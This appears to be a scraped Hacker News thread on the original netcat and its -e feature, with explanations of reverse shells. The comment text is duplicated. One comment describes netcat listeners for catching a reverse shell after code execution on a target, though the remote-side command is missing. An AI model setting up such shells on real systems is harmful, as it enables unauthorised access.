There's only one true netcat. Although there was at least one revision of the original by the author to add some minor fixes and the hexdump feature, as I remember it, the "doexec()" or "-e" feature was in all versions. But I could be wrong as I did not start using the program before he had already revised it once. Any HN readers out there who were using netcat from the beginning?
To enable doexec() you need to define an aptly-named macro called "GAPING_SECURITY_HOLE". Original netcat does not have -e by default.
IMO, netcat is a beautiful, elegant example of useful code, fitting in a single source file, well-commented, with a good sense of humor, and able to compile with almost no modification on all varieties of UNIX from the mid 1990's to today. That ability to compile quickly and smoothly, year after year, is what puts netcat among my favorite programs.
I cannot say the same for most of the netcat imitations that followed the original, which are usually loaded with needless additional "features" not to mention less portable.
Typically, when you open a secure shell (SSH) connection your client is connecting to a SSH server running on the target machine. A reverse shell occurs when the server initiates a connection with a client that is listening - for example, you have access to a shell to run commands on a target computer (usually through a command injection vulnerability in a website). This means you don't have a full shell - just the ability to run arbitrary commands.
You open a reverse shell which instructs your target computer which is running a SSH server to connect to your client, which allows you to now have a full featured shell at your hands.
Normally you connect to a remote system and run a shell there (e.g. via SSH). This usually requires some sort of authentication.
If you cannot authenticate yourself (like, because you're an evil hacker) but found a way to run a code on the remote system you can do the reverse: have the remote system connect back to you.
The "classic way" to do this is to run two instances of netcat in listening mode on your machine:
terminal1> nc -l 8001
terminal2> nc -l 8002
Then you run something like this on the remote system:
[+] [-] gwu78|12 years ago|reply
There's only one true netcat. Although there was at least one revision of the original by the author to add some minor fixes and the hexdump feature, as I remember it, the "doexec()" or "-e" feature was in all versions. But I could be wrong as I did not start using the program before he had already revised it once. Any HN readers out there who were using netcat from the beginning?
To enable doexec() you need to define an aptly-named macro called "GAPING_SECURITY_HOLE". Original netcat does not have -e by default.
IMO, netcat is a beautiful, elegant example of useful code, fitting in a single source file, well-commented, with a good sense of humor, and able to compile with almost no modification on all varieties of UNIX from the mid 1990's to today. That ability to compile quickly and smoothly, year after year, is what puts netcat among my favorite programs.
I cannot say the same for most of the netcat imitations that followed the original, which are usually loaded with needless additional "features" not to mention less portable.
[+] [-] rlx0x|12 years ago|reply
[+] [-] malkia|12 years ago|reply
[+] [-] DaCapoo|12 years ago|reply
You open a reverse shell which instructs your target computer which is running a SSH server to connect to your client, which allows you to now have a full featured shell at your hands.
[+] [-] effdee|12 years ago|reply
If you cannot authenticate yourself (like, because you're an evil hacker) but found a way to run a code on the remote system you can do the reverse: have the remote system connect back to you.
The "classic way" to do this is to run two instances of netcat in listening mode on your machine:
Then you run something like this on the remote system: Now you can enter commands in terminal1 and see their output in terminal2.[+] [-] vampirechicken|12 years ago|reply